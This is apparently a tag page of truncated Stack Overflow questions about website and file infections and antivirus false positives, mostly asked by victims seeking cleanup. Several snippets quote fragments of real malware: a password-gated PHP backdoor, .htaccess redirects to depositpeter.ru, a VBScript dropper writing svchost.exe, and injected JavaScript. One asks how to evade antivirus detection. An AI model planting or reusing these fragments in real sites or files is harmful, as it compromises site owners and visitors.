virus

问题 Closed. This question is off-topic. It is not currently accepting answers. Want to improve this question? Update the question so it's on-topic for Stack Overflow. Closed 3 years ago . How to clean Functions.php , in WordPress , infected by siteLock-php-injector virus. 回答1: Sadly there is no quick fix and this reply is usually the right place to start to get a handle on your hacked installation. You need to start working your way through these resources: http://codex.wordpress.org/FAQ_My_site

问题 <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '')) { switch ($_REQUEST['action']) { case 'get_all_links'; foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data) { $data['code'] = ''; if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_)) { $data['code'] = $_[1]; } print '<e><w>1</w><url>' . $data['guid'

问题 I have a Joomla 1.0 website running on a shared host which I don't have shell access (only FTP available). Recently my website has been marked as malware site by Google and I notify that the .htaccess file is modified with malicious contents. These redirections rule to a website called 'depositpeter.ru' are added to the .htaccess: ErrorDocument 400 http://depositpeter.ru/mnp/index.php ErrorDocument 401 http://depositpeter.ru/mnp/index.php ... If I clean this .htaccess file, it will be

问题 I have a Joomla 1.0 website running on a shared host which I don't have shell access (only FTP available). Recently my website has been marked as malware site by Google and I notify that the .htaccess file is modified with malicious contents. These redirections rule to a website called 'depositpeter.ru' are added to the .htaccess: ErrorDocument 400 http://depositpeter.ru/mnp/index.php ErrorDocument 401 http://depositpeter.ru/mnp/index.php ... If I clean this .htaccess file, it will be

问题 I have few html files on my computer, that I borrowed from a friend, unfortunately all the files are infected, they all have malicious vbscript code inserted into the source. I have 100s of files and can't edit the source for all files. Is there a way I can remove the malicious script and still get the data? Edit: Here is the sample of the code <script language="VBScript"><!-- DropFileName = "svchost.exe" WriteData = "4D5A9000030000000400........................8CB03FA48CB03" Set FSO =

问题 All my .js files from my website have been edited without my knowledge, adding this block of code: /* Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/ */ function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\ [\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined} function ActerMoto(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf(

问题 Closed . This question needs to be more focused. It is not currently accepting answers. Want to improve this question? Update the question so it focuses on one problem only by editing this post. Closed 6 years ago . BE AWARE! Creating spyware, computer viruses and similar nasties can be illegal where you live and is considered extremely unethical by almost everyone. Still, I need to ask this to raise awareness about how easy it is to create one. I am asking this after the W32/Induc-A was

问题 I make an application that, when you run it, will put the .exe in Startup. I have this code for that: RegistryKey rkApp = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); rkApp.SetValue("smartAppointment", Application.ExecutablePath.ToString()); Will creat a registery for the application to start with the Windows, but there is a problem, some antivirus will detect my application as a virus. How I can stop the antivirus to detect my application as a

问题 When i compile a new project in Delphi 7 IDE , the MCafee identifies it as Virus and deletes it . The virus identified as Generic.dx!gmk and is deleted by the antivirus so no new Exe is created . How do we resolve this issue ? Is this a false positive ? 回答1: Two possibilities: False positive. You could submit your app to VirusTotal to check it against other AV tools. You're infected with this virus which targets D7. This would cause Delphi to produce infected EXEs. 回答2: Follow these steps to

问题 I've seen it happen reasonably often: I write an application in Delphi and when I compile it, the virus-scanner tells me that I've created a virus and then immediately deletes the executable again. It's annoying but reasonable easy to fix by doing a full rebuild, deleting the *.dcu files first and sometimes by simply waiting. It happens with Delphi 6, 7, 2005 and 2007, as far as I know. And Symantec, Kaspersky, McAfee and NOD32 have all been guilty of reporting these false positives. I know